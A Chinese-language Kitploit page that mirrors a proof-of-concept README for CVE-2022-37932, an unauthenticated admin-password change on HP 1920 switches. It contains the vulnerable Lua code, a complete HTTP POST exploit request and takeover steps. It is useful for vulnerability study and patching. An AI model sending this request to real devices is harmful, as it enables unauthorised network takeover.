Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-37932 — 针对 HP 1920 系列交换机中身份验证绕过的概念验证漏洞利用,允许通过精心构造的 HTTP POST 请求在未经身份验证的情况下更改管理员密码。 | Kitploit
工具/GitHubGitHub/tim-hoekstra/cve-2022-37932
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

针对 HP 1920 系列交换机中身份验证绕过的概念验证漏洞利用,允许通过精心构造的 HTTP POST 请求在未经身份验证的情况下更改管理员密码。

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

HP 交换机固件认证绕过漏洞

CVE-2022-37932

固件版本:PD.02.21
受影响的设备:HP 1920系列智能托管交换机

概述

本仓库记录了运行固件版本 PD.02.21 的 HP 1920 系列智能托管交换机中的一个关键认证绕过漏洞。该漏洞允许未经认证的攻击者在无需事先认证的情况下更改管理员密码,从而完全接管设备。

技术细节

该漏洞存在于 /login/default_password_cfg.lua 脚本中,该脚本负责处理设备的默认密码更改。此脚本:

  1. 接受表单 POST 请求,但不检查用户是否已认证
  2. 仅验证 oldPwd 参数是否与默认密码(为空/空值)匹配
  3. 直接根据 POST 参数更改用户密码

漏洞代码

default_password_cfg.lua 中的关键易受攻击部分:

root@kitploit:~
if (request_method == 'POST') then
  -- 无认证或会话检查!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- 继续更改密码
    -- ...
  end
end

该脚本缺少关键安全控制:

  • 无会话验证
  • 无 CSRF 保护
  • 无速率限制
  • 无需认证即可直接访问密码更改功能

概念验证

攻击者可以使用简单的 HTTP POST 请求利用此漏洞:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [目标-IP]
Content-Type: application/x-www-form-urlencoded
Content-Length: [长度]

username=admin&oldPwd=&newPwd=[新密码]&confirmPwd=[新密码]

注意:oldPwd 参数留空,因为默认密码为空。

影响

此漏洞允许未经认证的攻击者:

  1. 在不知晓任何凭证的情况下更改管理员密码
  2. 获得设备的完全管理控制权
  3. 配置交换机、修改网络设置,并可能危及整个网络

利用路径

  1. 在网络中定位易受攻击的 HP 1920 系列交换机
  2. 向设备直接发送构造的 HTTP POST 请求
  3. 管理员密码被更改为攻击者控制的值
  4. 攻击者现在可以使用新密码和完全管理员权限登录

致谢

尚未有时间研究最初发现此漏洞的人,我只是发布概念验证。

法律免责声明

此信息仅供教育目的。作者对任何滥用此信息的行为不承担责任。在测试漏洞之前,请始终获得适当的授权。

下载工具